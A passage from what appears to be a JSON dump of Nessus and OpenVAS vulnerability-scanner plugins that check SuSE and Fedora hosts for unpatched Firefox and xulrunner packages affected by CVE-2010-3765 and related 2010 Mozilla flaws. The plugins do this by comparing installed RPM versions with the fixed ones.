found while investigating an\n intrusion attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3557 / 3558 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "50952", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs"]}
{"openvas": [{"lastseen": "2018-01-17T11:05:39", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050156.html"], "pluginID": "1361412562310862508", "description": "Check for the Version of xulrunner", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "type": "openvas", "title": "Fedora Update for xulrunner FEDORA-2010-16885", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862508", "id": "OPENVAS:1361412562310862508", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xulrunner on Fedora 12\";\ntag_insight = \"XULRunner provides the XUL Runtime environment for Gecko applications.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050156.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862508\");\n script_version(\"$Revision: 8438 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-16 18:38:23 +0100 (Tue, 16 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for xulrunner FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xulrunner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.1.15~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:05:32", "references": ["2010-16897", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050075.html"], "pluginID": "1361412562310862616", "description": "Check for the Version of firefox", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "title": "Fedora Update for firefox FEDORA-2010-16897", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862616", "id": "OPENVAS:1361412562310862616", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"firefox on Fedora 14\";\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\n compliance, performance and portability.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050075.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862616\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for firefox FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.12~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:53:58", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050155.html"], "pluginID": "862512", "description": "Check for the Version of gnome-python2-extras", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Fedora Update for gnome-python2-extras FEDORA-2010-16885", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862512", "id": "OPENVAS:862512", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-python2-extras on Fedora 12\";\ntag_insight = \"The gnome-python-extra package contains the source packages for additional\n Python bindings for GNOME. It should be used together with gnome-python.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050155.html\");\n script_id(862512);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-python2-extras\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~22.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:18", "references": ["2010-16897", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050078.html"], "pluginID": "862651", "description": "Check for the Version of xulrunner", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for xulrunner FEDORA-2010-16897", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862651", "id": "OPENVAS:862651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xulrunner on Fedora 14\";\ntag_insight = \"XULRunner provides the XUL Runtime environment for Gecko applications.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050078.html\");\n script_id(862651);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for xulrunner FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xulrunner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.12~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:42", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050076.html", "2010-16897"], "pluginID": "862583", "description": "Check for the Version of mozvoikko", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "title": "Fedora Update for mozvoikko FEDORA-2010-16897", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862583", "id": "OPENVAS:862583", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mozvoikko FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mozvoikko on Fedora 14\";\ntag_insight = \"This is mozvoikko, an extension for Mozilla programs for using the Finnish\n spell-checker Voikko.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050076.html\");\n script_id(862583);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for mozvoikko FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mozvoikko\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 